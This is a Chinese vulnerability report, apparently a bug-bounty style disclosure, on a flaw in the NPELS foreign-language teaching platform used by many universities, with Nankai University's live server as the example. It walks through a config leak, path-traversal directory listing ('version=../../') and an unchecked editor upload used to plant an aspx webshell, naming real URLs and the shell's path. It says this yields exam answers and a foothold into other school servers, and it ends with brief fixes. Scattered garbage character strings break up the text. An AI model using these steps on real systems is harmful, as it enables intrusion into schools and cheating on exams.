新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
# |5 p5 W& ], L
以南开大学的为例:
3 m" @& _1 J9 [' J/ S' F+ dhttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
; g- }  w3 F( A6 t1 J<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# Z+ R2 k1 V* Y4 b/ j( M% L</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
, s2 N0 D: D2 I</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
4 Q- ?# O5 A% P, @5 J2 K% ?http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
# |! i; T2 U  L% |* j9 C4 o进一步列目录（返回的网页很大，可以直接 wget 下来）
0 n5 ?$ {/ Q. F0 G& Lhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
$ n7 o: G* {1 \3 Z可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
- x2 }$ z: M' ^+ K7 h$ d( J
OOXX
( o; _6 @, P% r2 x* `
9 S6 ]1 x3 f$ {: B/ uGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

4 E2 y8 F- I/ o/ t2 p列目录：
( w/ |* b5 M0 B" k' r7 z2 Q0 vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
: h$ n4 K; N5 w' A! l! c) E9 `$ qhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
2 G( |' B; Y9 t0 j好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​